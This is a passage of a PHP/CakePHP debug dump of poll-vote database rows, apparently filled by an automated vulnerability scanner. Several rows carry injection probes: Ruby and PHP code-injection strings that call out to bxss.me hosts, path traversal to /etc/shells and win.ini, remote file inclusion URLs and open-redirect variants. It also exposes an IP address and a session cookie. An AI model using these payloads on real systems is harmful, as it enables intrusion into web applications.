'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6142 => array(
'id' => '6685',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6143 => array(
'id' => '6686',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6144 => array(
'id' => '6687',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6145 => array(
'id' => '6688',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6146 => array(
'id' => '6689',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6147 => array(
'id' => '6690',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6148 => array(
'id' => '6691',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6149 => array(
'id' => '6692',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6150 => array(
'id' => '6693',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6151 => array(
'id' => '6694',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6152 => array(
'id' => '6695',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6153 => array(
'id' => '6696',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6154 => array(
'id' => '6697',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6155 => array(
'id' => '6698',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6156 => array(
'id' => '6699',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6157 => array(
'id' => '6700',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6158 => array(
'id' => '6701',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6159 => array(
'id' => '6702',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6160 => array(
'id' => '6703',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6161 => array(
'id' => '6704',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6162 => array(
'id' => '6705',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6163 => array(
'id' => '6706',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6164 => array(
'id' => '6707',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6165 => array(
'id' => '6708',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6166 => array(
'id' => '6709',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6167 => array(
'id' => '6710',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6168 => array(
'id' => '6711',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6169 => array(
'id' => '6712',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6170 => array(
'id' => '6713',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6171 => array(
'id' => '6714',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6172 => array(
'id' => '6715',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6173 => array(
'id' => '6716',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6174 => array(
'id' => '6717',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6175 => array(
'id' => '6718',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6176 => array(
'id' => '6719',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6177 => array(
'id' => '6720',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6178 => array(
'id' => '6721',
'ip' => '85.190.233.47',
'ip1' => '"+"A".concat(70-3).concat(22*4).concat(122).concat(78).concat(105).concat(78)+(require"socket"
Socket.gethostbyname("hitjy"+"ybkuabqxa6059.bxss.me.")[3].to_s)+"',
'sondage_id' => '2'
),
(int) 6179 => array(
'id' => '6722',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6180 => array(
'id' => '6723',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6181 => array(
'id' => '6724',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6182 => array(
'id' => '6725',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6183 => array(
'id' => '6726',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6184 => array(
'id' => '6727',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6185 => array(
'id' => '6728',
'ip' => '85.190.233.47',
'ip1' => ''+'A'.concat(70-3).concat(22*4).concat(119).concat(70).concat(112).concat(70)+(require'socket'
Socket.gethostbyname('hitpa'+'wahmraos0fdc9.bxss.me.')[3].to_s)+'',
'sondage_id' => '2'
),
(int) 6186 => array(
'id' => '6729',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6187 => array(
'id' => '6730',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6188 => array(
'id' => '6731',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6189 => array(
'id' => '6732',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6190 => array(
'id' => '6733',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6191 => array(
'id' => '6734',
'ip' => '85.190.233.47',
'ip1' => ')))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))',
'sondage_id' => '2'
),
(int) 6192 => array(
'id' => '6735',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6193 => array(
'id' => '6736',
'ip' => '85.190.233.47',
'ip1' => ''A'.concat(70-3).concat(22*4).concat(100).concat(76).concat(101).concat(70)+(require'socket'
Socket.gethostbyname('hitqg'+'rosoyojed5cff.bxss.me.')[3].to_s)',
'sondage_id' => '2'
),
(int) 6194 => array(
'id' => '6737',
'ip' => '/etc/shells',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6195 => array(
'id' => '6738',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6196 => array(
'id' => '6739',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6197 => array(
'id' => '6740',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6198 => array(
'id' => '6741',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6199 => array(
'id' => '6742',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6200 => array(
'id' => '6743',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6201 => array(
'id' => '6744',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6202 => array(
'id' => '6745',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6203 => array(
'id' => '6746',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6204 => array(
'id' => '6747',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6205 => array(
'id' => '6748',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6206 => array(
'id' => '6749',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6207 => array(
'id' => '6750',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6208 => array(
'id' => '6751',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6209 => array(
'id' => '6752',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6210 => array(
'id' => '6753',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6211 => array(
'id' => '6754',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6212 => array(
'id' => '6755',
'ip' => 'c:/windows/win.ini',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6213 => array(
'id' => '6756',
'ip' => 'xfs.bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6214 => array(
'id' => '6757',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6215 => array(
'id' => '6758',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6216 => array(
'id' => '6759',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6217 => array(
'id' => '6760',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6218 => array(
'id' => '6761',
'ip' => '85.190.233.47',
'ip1' => 'xfs.bxss.me',
'sondage_id' => '2'
),
(int) 6219 => array(
'id' => '6762',
'ip' => 'bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6220 => array(
'id' => '6763',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6221 => array(
'id' => '6764',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6222 => array(
'id' => '6765',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6223 => array(
'id' => '6766',
'ip' => '85.190.233.47',
'ip1' => 'http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg',
'sondage_id' => '2'
),
(int) 6224 => array(
'id' => '6767',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6225 => array(
'id' => '6768',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6226 => array(
'id' => '6769',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6227 => array(
'id' => '6770',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6228 => array(
'id' => '6771',
'ip' => '85.190.233.47',
'ip1' => '1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg',
'sondage_id' => '2'
),
(int) 6229 => array(
'id' => '6772',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6230 => array(
'id' => '6773',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6231 => array(
'id' => '6774',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6232 => array(
'id' => '6775',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6233 => array(
'id' => '6776',
'ip' => 'bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6234 => array(
'id' => '6777',
'ip' => '85.190.233.47',
'ip1' => 'Http://bxss.me/t/fit.txt',
'sondage_id' => '2'
),
(int) 6235 => array(
'id' => '6778',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6236 => array(
'id' => '6779',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6237 => array(
'id' => '6780',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6238 => array(
'id' => '6781',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6239 => array(
'id' => '6782',
'ip' => 'scimat.dz.bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6240 => array(
'id' => '6783',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6241 => array(
'id' => '6784',
'ip' => '85.190.233.47',
'ip1' => 'http://bxss.me/t/fit.txt%3F.jpg',
'sondage_id' => '2'
),
(int) 6242 => array(
'id' => '6785',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6243 => array(
'id' => '6786',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6244 => array(
'id' => '6787',
'ip' => 'scimat.dz@bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6245 => array(
'id' => '6788',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6246 => array(
'id' => '6789',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6247 => array(
'id' => '6790',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6248 => array(
'id' => '6791',
'ip' => '85.190.233.47',
'ip1' => '/etc/shells',
'sondage_id' => '2'
),
(int) 6249 => array(
'id' => '6792',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6250 => array(
'id' => '6793',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6251 => array(
'id' => '6794',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6252 => array(
'id' => '6795',
'ip' => 'scimat.dz:80@bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6253 => array(
'id' => '6796',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6254 => array(
'id' => '6797',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6255 => array(
'id' => '6798',
'ip' => '85.190.233.47',
'ip1' => '../../../../../../../../../../../../../../etc/shells',
'sondage_id' => '2'
),
(int) 6256 => array(
'id' => '6799',
'ip' => 'bxss.me\@scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6257 => array(
'id' => '6800',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6258 => array(
'id' => '6801',
'ip' => '85.190.233.47',
'ip1' => 'c:/windows/win.ini',
'sondage_id' => '2'
),
(int) 6259 => array(
'id' => '6802',
'ip' => 'bxss.me#scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6260 => array(
'id' => '6803',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6261 => array(
'id' => '6804',
'ip' => ''"',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6262 => array(
'id' => '6805',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6263 => array(
'id' => '6806',
'ip' => '85.190.233.47',
'ip1' => 'bxss.me',
'sondage_id' => '2'
),
(int) 6264 => array(
'id' => '6807',
'ip' => 'bxss.me?scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6265 => array(
'id' => '6808',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6266 => array(
'id' => '6809',
'ip' => '<!--',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6267 => array(
'id' => '6810',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6268 => array(
'id' => '6811',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6269 => array(
'id' => '6812',
'ip' => '85.190.233.47',
'ip1' => ''"',
'sondage_id' => '2'
),
(int) 6270 => array(
'id' => '6813',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6271 => array(
'id' => '6814',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6272 => array(
'id' => '6815',
'ip' => '//bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6273 => array(
'id' => '6816',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6274 => array(
'id' => '6817',
'ip' => '85.190.233.47',
'ip1' => '<!--',
'sondage_id' => '2'
),
(int) 6275 => array(
'id' => '6818',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6276 => array(
'id' => '6819',
'ip' => '//scimat.dz.bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6277 => array(
'id' => '6820',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6278 => array(
'id' => '6821',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6279 => array(
'id' => '6822',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6280 => array(
'id' => '6823',
'ip' => '//scimat.dz@bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6281 => array(
'id' => '6824',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6282 => array(
'id' => '6825',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6283 => array(
'id' => '6826',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6284 => array(
'id' => '6827',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6285 => array(
'id' => '6828',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6286 => array(
'id' => '6829',
'ip' => '//bxss.me\@scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6287 => array(
'id' => '6830',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6288 => array(
'id' => '6831',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6289 => array(
'id' => '6832',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6290 => array(
'id' => '6833',
'ip' => '//bxss.me#scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6291 => array(
'id' => '6834',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6292 => array(
'id' => '6835',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6293 => array(
'id' => '6836',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6294 => array(
'id' => '6837',
'ip' => '//bxss.me?scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6295 => array(
'id' => '6838',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6296 => array(
'id' => '6839',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6297 => array(
'id' => '6840',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6298 => array(
'id' => '6841',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6299 => array(
'id' => '6842',
'ip' => 'http:bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6300 => array(
'id' => '6843',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6301 => array(
'id' => '6844',
'ip' => 'http:bxss.me/',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6302 => array(
'id' => '6845',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6303 => array(
'id' => '6846',
'ip' => '85.190.233.47',
'ip1' => ';assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));',
'sondage_id' => '2'
),
(int) 6304 => array(
'id' => '6847',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6305 => array(
'id' => '6848',
'ip' => 'http:bxss.me/\',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6306 => array(
'id' => '6849',
'ip' => '85.190.233.47',
'ip1' => '';print(md5(31337));$a='',
'sondage_id' => '2'
),
(int) 6307 => array(
'id' => '6850',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6308 => array(
'id' => '6851',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6309 => array(
'id' => '6852',
'ip' => '85.190.233.47',
'ip1' => '";print(md5(31337));$a="',
'sondage_id' => '2'
),
(int) 6310 => array(
'id' => '6853',
'ip' => '85.190.233.47',
'ip1' => '${@print(md5(31337))}',
'sondage_id' => '2'
),
